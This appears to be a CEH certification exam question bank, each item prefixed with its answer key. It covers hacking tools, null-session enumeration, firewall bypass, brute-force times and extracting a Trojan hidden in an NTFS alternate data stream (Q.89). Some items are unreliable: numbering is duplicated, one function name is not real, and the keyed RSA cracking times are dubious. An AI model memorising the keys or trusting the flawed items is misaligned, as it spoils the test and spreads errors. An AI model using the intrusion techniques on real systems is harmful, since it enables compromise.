B#CEH Q.80 Take a look at the following code:^  c : \ < w d s _ n w w w . m i k e g o l d s . c o m _ I 4 . 6 . 7 . 8 _ g 0 0 - 0 0 - 3 9 - 5 c - 4 5 - 3 b^  What does the hacking tool wds do? (Select the Best Answer)^A.	It retrieves DNS records from ARIN database for the domain www.mikegolds.com^B.	It spoofs DNS domain name www.mikegolds.com to the IP address 4.6.7.8^C.	It poisons the MAC address located at 4.6.7.8 with 00-00-39-5c-45-3b^D.	It hijacks TCP sessions originating from www.mikegolds.com to the attackers machine located at 4.6.7.8
C#CEH Q.81 Which of the following is a Linux based sniffer detection tool? (Select the Best Answer)^A.	WinSniffer^B.	SniffDet^C.	Ethereal^D.	Ettercap
D#CEH Q.82 You launch Nmap targeting the domain http://www.furnituremill.com.^  Port 		State 		Service^  21/tcp 		open 		ftp^  80/tcp 		open 		http^  135/tcp 		open 		loc-srv^  139/tcp 		open 		netbios-ssn^  443/tcp 		open 		https^  1031/tcp 	open 		iads^  From the above output, you notice that port 139 is open. What hacking tool will you use to download list of shares and usernames from the domain http://www.furnituremill.com assuming you can connect through null sessions? (Select the Best Answer)^A.	SMBRelay^B.	SMBDump^C.	User2Sid^D.	DumpSec
B#CEH Q.84 Which of the following tool will you use to bypass a firewall that blocks all ports except ICMP?(Select all that apply)^A.	HTTP Reverse Shell^B.	Loki^C.	HTTP Tunnel^D.	007Shell
B#CEH Q.85 How long will it take to crack RSA 40 bits key using a single Pentium 4 (2.4 GHZ computer) using brute-force attack? (Select the Best Answer)^A.	1.4 seconds^B.	1.4 minutes^C.	73 days^D.	50 years^E.	10 power 20 years 
C#CEH Q.86 How long will it take to crack RSA 56 bits key using a single Pentium 4 (2.4 GHZ computer) using brute-force attack? (Select the Best Answer)^A.	1.4 seconds^B.	1.4 minutes^C.	73 days^D.	50 years^E.	10 power 20 years 
E#CEH Q.87 How long will it take to crack RSA 128 bits key using a single Pentium 4 (2.4 GHZ computer) using brute-force attack? (Select the Best Answer)^A.	1.4 seconds^B.	1.4 minutes^C.	73 days^D.	50 years^E.	10 power 20 years 
A,B,D,E#CEH Q.86  Buffer Overflow Vulnerabilities are due to applications that do not perform bound checks in the code. Which of the following C/C++ functions do not perform bound checks? (Select all that apply)^A.	gets()^B.	memcpy()^C.	strcpr()^D.	scanf()^E.	strcat()
D#CEH Q.88 How long will it take to crack RSA 64 bits key using a single Pentium 4 2.4 GHZ computer using brute-force attack? (Select the Best Answer)^A.	1.4 seconds^B.	1.4 minutes^C.	73 days^D.	50 years^E.	10 power 20 years
C#CEH Q.89 You have hidden a Trojan file virus.exe inside an abc.txt file using NTFS streaming. Which command would you execute to extract the Trojan to a standalone file? (Select the Best Answer)^A.	c:\> type abc.txt:virus.exe > virus.exe^B.	c:\> more abc.txt|virus.exe > virus.exe^C.	c:\> cat abc.txt:virus.exe > virus.exe^D.	c:\> list abc.txt$virus.exe > virus.exe